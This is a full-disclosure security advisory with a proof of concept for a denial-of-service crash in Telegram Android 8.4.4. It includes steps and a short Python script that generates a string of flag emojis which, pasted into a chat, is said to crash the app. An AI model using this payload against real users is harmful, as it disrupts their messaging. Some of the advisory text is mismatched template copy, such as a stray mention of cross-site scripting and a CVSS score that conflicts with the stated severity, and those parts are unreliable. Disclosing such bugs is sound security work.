Document Title:
===============
Telegram Android v8.4.4 - Denial of Service (PoC)


References (Source):
====================
https://twitter.com/h4shur


Release Date:
=============
2022-01-30


Common Vulnerability Scoring System:
====================================
7.8


Product & Service Introduction:
===============================
Telegram is a freeware, cross-platform, cloud-based instant messaging (IM)
service. The service also provides end-to-end encrypted video calling,
VoIP, file sharing and several other features. It was launched for iOS on
14 August 2013 and Android in October 2013. The servers of Telegram are
distributed worldwide to decrease frequent data load with five data centers
in different regions, while the operational center is based in Dubai in the
United Arab Emirates. Various client apps are available for desktop and
mobile platforms including official apps for Android, iOS, Windows, macOS
and Linux (although registration requires an iOS or Android device and a
working phone number). There are also two official Telegram web twin apps –
WebK and WebZ – and numerous unofficial clients that make use of Telegram's
protocol. All of Telegram's official components are open source, with the
exception of the server which is closed-sourced and proprietary.

Telegram provides end-to-end encrypted voice and video calls and optional
end-to-end encrypted "secret" chats. Cloud chats and groups are encrypted
between the app and the server, so that ISPs and other third-parties on the
network can't access data, but the Telegram server can. Users can send text
and voice messages, make voice and video calls, and share an unlimited
number of images, documents (2 GB per file), user locations, animated
stickers, contacts, and audio files. In January 2021, Telegram surpassed
500 million monthly active users. It was the most downloaded app worldwide
in January 2021 with 1 billion downloads globally as of late August 2021.


Abstract Advisory Information:
==============================
An independent vulnerability researcher discovered Android application
vulnerabilities in the Telegram application.


Affected Product(s):
====================
Vendor: telegram.org / telegram.me / t.me
Product: Android Telegram application (Android-Application)
https://telegram.org/android


Vulnerability Disclosure Timeline:
==================================
2022-01-30: Researcher Notification & Coordination (Security Researcher)
2022-01-30: Public Disclosure


Discovery Status:
=================
Published


Exploitation Technique:
=======================
local


Severity Level:
===============
medium


Disclosure Type:
================
Full Disclosure


Technical specifications and description:
================================
1.1
In version 8.4.4 of Android Telegram application, a denial of service
vulnerability was discovered by H4shur. Vulnerability is in the emojis of
these messenger.

1.2
If you send a number of flag emojis with any text on the chat page,
clicking on that message will stop the program altogether and avoid
providing services.


Proof of Concept (PoC):
=======================
1.1
A Denial of Service (DOS) attack is a type of cyberattack in which a
malicious person performs an attack with the aim of removing the resources
of a system from the reach of its users.
It is natural that if this attack is successful, the result will be a
slowdown or disabling of the equipment and resources available to the
victim.
For security demonstration or to reproduce the persistent cross site web
vulnerability follow the provided information and steps below to continue.


PoC: Exploitation
1.1
Run the python script, it will create a new file "outputbufferh4shur.txt".
1.2
Run Telegram Android and go to "Saved Messages" or any Chat page.
1.3
Copy the content of the file "outputbufferh4shur.txt".
1.4
Paste the content of outputbufferh4shur.txt into the "Write a message..."
and then type any text to this message.
1.5
Ops...
Telegram Crashed <3


script:
bufferh4shur = "🇮🇷" * 114
try:
    f=open("outputbufferh4shur.txt","w")
    print("[!] Creating %s bytes DOS payload...." %len(bufferh4shur))
    f.write(bufferh4shur)
    f.close()
    print("[!] File Created!")
except:
    print("File cannot be created!")



Security Risk:
==============
1.1
A Denial of Service (DOS) attack is a type of cyberattack in which a
malicious person performs an attack with the aim of removing the resources
of a system from the reach of its users.
It is natural that if this attack is successful, the result will be a
slowdown or disabling of the equipment and resources available to the
victim.


Credits & Authors:
==================
h4shur
Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @h4shur
h4shursec@gmail.com